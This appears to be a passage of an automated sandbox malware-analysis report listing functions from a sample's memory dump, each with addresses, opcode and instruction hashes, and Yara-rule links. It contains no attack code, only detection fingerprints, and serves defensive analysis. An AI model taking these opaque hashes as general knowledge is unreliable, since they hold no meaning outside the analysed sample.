                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a2a2156802e00de797df2096a2527c6a508e4247c11138e73149dded230b95bc
                                                                                                                • Instruction ID: 37d2f0a3e31a9e3647b1e136c7b6b5b738de433462ed2960f50a4a01383fa751
                                                                                                                • Opcode Fuzzy Hash: a2a2156802e00de797df2096a2527c6a508e4247c11138e73149dded230b95bc
                                                                                                                • Instruction Fuzzy Hash: FE319372608751ABC320DF68C941AAAB7F5BFC8710F054A29F89587791E730ED44C7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009BC182, Relevance: .1, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                • Instruction ID: 622713bc34ab22b637280a0083087301f8c1c66cd0a9e491d4c4c1ae035dc7ee
                                                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                • Instruction Fuzzy Hash: 903139B160554ABED704EBF4C691BE9FB58BF82314F14816AE42C57342DB38AD09D7E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A43D40, Relevance: .1, Instructions: 98COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c7e9be8d07f9ab4f33990820cee77e3e5cdc4b60f5c3ca59c8e5ebbae435c8db
                                                                                                                • Instruction ID: 5d158e9b622f56e881fd14a2e9539d989d89b031f9c5a33ca4397b4c98179492
                                                                                                                • Opcode Fuzzy Hash: c7e9be8d07f9ab4f33990820cee77e3e5cdc4b60f5c3ca59c8e5ebbae435c8db
                                                                                                                • Instruction Fuzzy Hash: F131667690A302DFCB14DF64C98295ABBE1FFC5710F45896EE8988B291D730DE04CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009CA70E, Relevance: .1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7fa36b258768898ffb015ac356e5ac6f9adf3cc832e22865048180cea14e26a6
                                                                                                                • Instruction ID: 9bd4805a6f63c21d69c28e83bb4dbae07d6cf1efbae7b7362992660bceade346
                                                                                                                • Opcode Fuzzy Hash: 7fa36b258768898ffb015ac356e5ac6f9adf3cc832e22865048180cea14e26a6
                                                                                                                • Instruction Fuzzy Hash: C831A0B1A08208DFC711CB98EC99F6D77FAFB85714F24495AE056C7260D774D902CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C61A0, Relevance: .1, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8c70af1c39c05539a2f9590fbd4e8e7be1cc4d038f4668ed969714f514bca4dc
                                                                                                                • Instruction ID: 762b3eca8ffe9a73764951db20523faa0cdb44d0849074478098c2b8da4f236c
                                                                                                                • Opcode Fuzzy Hash: 8c70af1c39c05539a2f9590fbd4e8e7be1cc4d038f4668ed969714f514bca4dc
                                                                                                                • Instruction Fuzzy Hash: 3C316B71A097018FD360CF19C900F2AB7E8FB88B00F59496DE99997391E771EC44CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0099AA16, Relevance: .1, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0b5f49c0ea3909a0250bdd495fb76e83adea539706599007f412b4b5eab82275
                                                                                                                • Instruction ID: 3adaea3858cd6f0708b79a53292cd67cacf6d1700780990d835bace33378d180
                                                                                                                • Opcode Fuzzy Hash: 0b5f49c0ea3909a0250bdd495fb76e83adea539706599007f412b4b5eab82275
                                                                                                                • Instruction Fuzzy Hash: 0931B172A00219ABCF109FA8CD82BBFB7B9EF44700B11446AF905EB251E7749D11DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D4A2C, Relevance: .1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8f6273817b0d16a02fa5764c70a98c7b62341600af3bbffb741cc45b0f71d749
                                                                                                                • Instruction ID: fdb46a261a43a87885023d9d01842c8e403221fe7099758029760bcd53f78cba
                                                                                                                • Opcode Fuzzy Hash: 8f6273817b0d16a02fa5764c70a98c7b62341600af3bbffb741cc45b0f71d749
                                                                                                                • Instruction Fuzzy Hash: AE31D1326852509FC731EF54C945B2ABBE8FFC5B10F50892AE8565B791DB78DC00CB86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D8EC7, Relevance: .1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0a04229b4bb65772f7a6a0bbea6d9d0f161c7b807861995e26501e354125e59f
                                                                                                                • Instruction ID: d7fe8f73972764b25701b6fbea7ed84d508028caaa52fb4724e24cdd59188d67
                                                                                                                • Opcode Fuzzy Hash: 0a04229b4bb65772f7a6a0bbea6d9d0f161c7b807861995e26501e354125e59f
                                                                                                                • Instruction Fuzzy Hash: 9941A4B1D003189EDB10DFAAD981AADFBF8FB48710F90816EE509A7641DB745A44CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009CE730, Relevance: .1, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ba5e624c97302736bb563cbe2e1c360f22a457cfd7481f1b5cc5c10a7fbbe8bd
                                                                                                                • Instruction ID: b8235899f934b767918ed5e13c3bbfcb1b3b36bcc4b9416c3ea122cf30fba805
                                                                                                                • Opcode Fuzzy Hash: ba5e624c97302736bb563cbe2e1c360f22a457cfd7481f1b5cc5c10a7fbbe8bd
                                                                                                                • Instruction Fuzzy Hash: 3431B175A14249EFD704CF58D841F9ABBE8FB09310F14865AF905CB341D631ED80CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009CBC2C, Relevance: .1, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9b130e9e0f58ca8562a8871460157bcd19beb291f4fdd11ccf6ec63d2118a392
                                                                                                                • Instruction ID: 6faca6927eb109d6f85b48978ed522d97d51b27b70d875b6227d660ed520119b
                                                                                                                • Opcode Fuzzy Hash: 9b130e9e0f58ca8562a8871460157bcd19beb291f4fdd11ccf6ec63d2118a392
                                                                                                                • Instruction Fuzzy Hash: 0D310172A006159FDB01DF98D882BA673B4EF18310F104078EC45DB282E774DD06CB82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00999100, Relevance: .1, Instructions: 87COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 51b58b04929590b856eb31790ab9c4e46097ea29c79f68005ad03195ccb4bc1a
                                                                                                                • Instruction ID: 313c204b03357fecb34ae5b1eca250a75c2a3c828a4f81668b9f3174939a75b6
                                                                                                                • Opcode Fuzzy Hash: 51b58b04929590b856eb31790ab9c4e46097ea29c79f68005ad03195ccb4bc1a
                                                                                                                • Instruction Fuzzy Hash: D131F271A09286DFDF35DF6CC488BACBBB9BB89350F28815DD40467251D738AD80CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C1DB5, Relevance: .1, Instructions: 87COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                • Instruction ID: 3d2e8fad058518c843b82c087e0c5af9d86684f25a23059104600b7d73acd3df
                                                                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                • Instruction Fuzzy Hash: 38218D32A00518EBC720CF99CD80FABBBBDEF86750F514459E901D7222D634AE01DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009B0050, Relevance: .1, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ad910da867ea22bbb1d3edefcc1b52e95aaf0808711abc99ec6b8aab3798706c
                                                                                                                • Instruction ID: 70c48b3d249f5bc48af93c3a896f4ed3deeee661bb7141601d96f257292a1d92
                                                                                                                • Opcode Fuzzy Hash: ad910da867ea22bbb1d3edefcc1b52e95aaf0808711abc99ec6b8aab3798706c
                                                                                                                • Instruction Fuzzy Hash: 45318E31601B04CFD725DF28C945B97B3E5FF88724F14866DE59687690EB35AC01CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A16C0A, Relevance: .1, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8e4946cb2fda34bada0ec3642ca9046889ec1346e6eb446e435f933402d9dd5e
                                                                                                                • Instruction ID: f33220d8b2796624f87e9a3089ed0ee257eb37fc61057018f6fb3f37808fd14a
                                                                                                                • Opcode Fuzzy Hash: 8e4946cb2fda34bada0ec3642ca9046889ec1346e6eb446e435f933402d9dd5e
                                                                                                                • Instruction Fuzzy Hash: 4221DE71A00644AFC711DFA8D980FAAB7B8FF88750F14416AF805CB791D634ED50CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D90AF, Relevance: .1, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                • Instruction ID: 4be3e458361c99df6c128209127ce8acdbd7260d5c9c675adff40d1c7f1ae517
                                                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                • Instruction Fuzzy Hash: 79217CB1A40206EFDB21EF99C845EAAF7F8EB54750F14886BF949A7351D234AD408B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C3B7A, Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a22b6bc56d730a5e0363f9a11b450a60367958b39e393d417ae61a5ee8e8c1ab
                                                                                                                • Instruction ID: bedf4dc08219b1e43b8e0a540c25884ed1440722e850cf79a240c0e41f88ef2e
                                                                                                                • Opcode Fuzzy Hash: a22b6bc56d730a5e0363f9a11b450a60367958b39e393d417ae61a5ee8e8c1ab
                                                                                                                • Instruction Fuzzy Hash: 6B21C272A40119AFC700DF98CD82F6EB7BDFB44308F154068E908AB262D775EE11CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A16CF0, Relevance: .1, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8211a759a9cedd507556c0c945eeb3d96a27f08f66055a661905a22f51ffc191
                                                                                                                • Instruction ID: 95ea477adb2f1cfcdc6308c96cd1b089a2e6b8d823ab6b0d1e82ee6caa718e4e
                                                                                                                • Opcode Fuzzy Hash: 8211a759a9cedd507556c0c945eeb3d96a27f08f66055a661905a22f51ffc191
                                                                                                                • Instruction Fuzzy Hash: BD21B072604B449BC711DF69DA44BEBB7ECEFC1790F04096AB980C7261E734D948C6A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A6070D, Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                • Instruction ID: d4ffbb9e94d7ef80cf5fea0cf56daae3b5aead4b14b4360f0f274de759b350b9
                                                                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                • Instruction Fuzzy Hash: 3C21D0362046009FD705DF28C880FABBBB5EBC4350F048669F9958B386D630ED49CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009BAE73, Relevance: .1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                • Instruction ID: a9233ed336afc01ccf40cca7808bb2b185a8cbc17791d2fe8224b5bb2a9c4918
                                                                                                                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                • Instruction Fuzzy Hash: B0212731605788DFD726DB69DA88BA577E8EF84360F1904A0ED048B7E2E739DC40C7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A17794, Relevance: .1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: db833bcc4d73a65ec26db0488f240f4366437b234fc5ce090c051ee0f875f913
                                                                                                                • Instruction ID: ea4ce5158c2804bf2aee3da2ad399ceac3efc447f3f918af5b446f9a6d8bac66
                                                                                                                • Opcode Fuzzy Hash: db833bcc4d73a65ec26db0488f240f4366437b234fc5ce090c051ee0f875f913
                                                                                                                • Instruction Fuzzy Hash: 25219D72904604ABC725DFA9D894EABB7B9EF88350F104569F50AC7790EA34ED40CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009CFD9B, Relevance: .1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                • Instruction ID: e6da6c9bcaca09bbccb86014ba2f517701544891ce3ba51fb79b01fa119e4384
                                                                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                • Instruction Fuzzy Hash: C721BE72A00A41DFC730CF49D650F62F7EAEB94B10F20857EE84687662D7349C00DB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00999240, Relevance: .1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 28f81ec6d70b93840e316cd029dff16f5feab17a6710b7ce902f5538514f6212
                                                                                                                • Instruction ID: 8f7a582fedf272fbf598dd6a2adf37629997cec4dbf6f23d8b62a7446bc90d91
                                                                                                                • Opcode Fuzzy Hash: 28f81ec6d70b93840e316cd029dff16f5feab17a6710b7ce902f5538514f6212
                                                                                                                • Instruction Fuzzy Hash: 1C213972091641EFC722EF68CE42F59B7B9FF48714F544A6CF0498A6A2CB34E941CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009CB390, Relevance: .1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 41b9bb889b0c6162565187e6d1ec7678bd184d9a911eac26681c678da6559e52
                                                                                                                • Instruction ID: 0e06d0ec40bab26cb477ef462be3ef366dc827defcda20a0be8b91383f9d7952
                                                                                                                • Opcode Fuzzy Hash: 41b9bb889b0c6162565187e6d1ec7678bd184d9a911eac26681c678da6559e52
                                                                                                                • Instruction Fuzzy Hash: 05114C37B151105BCB28DA149D82B6B7396EBD5330F24413DE916DB3C0DE355C01C796
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A24257, Relevance: .1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d353e6b7d210c62a470d34dee403f127ee4660aebf5721cd830081a54c8e63bc
                                                                                                                • Instruction ID: 8873f591c936fe889b41e27a7fbb5385cb58a16d443565a5b5480b316360d1d5
                                                                                                                • Opcode Fuzzy Hash: d353e6b7d210c62a470d34dee403f127ee4660aebf5721cd830081a54c8e63bc
                                                                                                                • Instruction Fuzzy Hash: 17216070902B11DFC715EFA9E500A54BBF1FB89715BA4827EE1158B2A1DF35D882CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C2397, Relevance: .1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 19df11f808db092e864a5c8fc01592f657097254ac68ba21f3b7635886bb1959
                                                                                                                • Instruction ID: 98f80c688aa5002264860bc269ae73cd0fb920e4d3dced70093cfa44038de6f9
                                                                                                                • Opcode Fuzzy Hash: 19df11f808db092e864a5c8fc01592f657097254ac68ba21f3b7635886bb1959
                                                                                                                • Instruction Fuzzy Hash: 83112B32B4034067D734A73DAC91F16B2CDBB90B60F54843AF50AA7291DDBCD8418755
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A146A7, Relevance: .1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                • Instruction ID: 73c9627b7f85bc0b4af4003efcf2d35ced423f47c8e13bf59d7b80f57f5df09c
                                                                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                • Instruction Fuzzy Hash: 2A110272904208BBC7019F5C98819BEF7B9EFD9310F10806AF9448B351DA318D51D3A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0099C962, Relevance: .1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f7b2093a9a3ff91fa7337104c088567cb6a3f5e9a79bb0e0ba469380b463437a
                                                                                                                • Instruction ID: c47e8e99d1116def1ad3b61eb441eaa80a16754d5ba97e01f96ae031cfc6aab1
                                                                                                                • Opcode Fuzzy Hash: f7b2093a9a3ff91fa7337104c088567cb6a3f5e9a79bb0e0ba469380b463437a
                                                                                                                • Instruction Fuzzy Hash: AE11CE3170864AABD710AF68EC96A6EB7B5BB84714B200539F851876A2DB30FC50C7D1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D37F5, Relevance: .1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e441889886c9da76244c43b7cdbf79557e0f95540e6518a7cc9e66ed792a1c9c
                                                                                                                • Instruction ID: 64ff57d0341d387e802a9b698f5658b296a41e1291f83ba5518e8f8aaf3438b4
                                                                                                                • Opcode Fuzzy Hash: e441889886c9da76244c43b7cdbf79557e0f95540e6518a7cc9e66ed792a1c9c
                                                                                                                • Instruction Fuzzy Hash: 070126B29816109BC337CB599A40E26BBAADFC1BA2715C06BF8458B311CB30CE01D7C1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C002D, Relevance: .1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
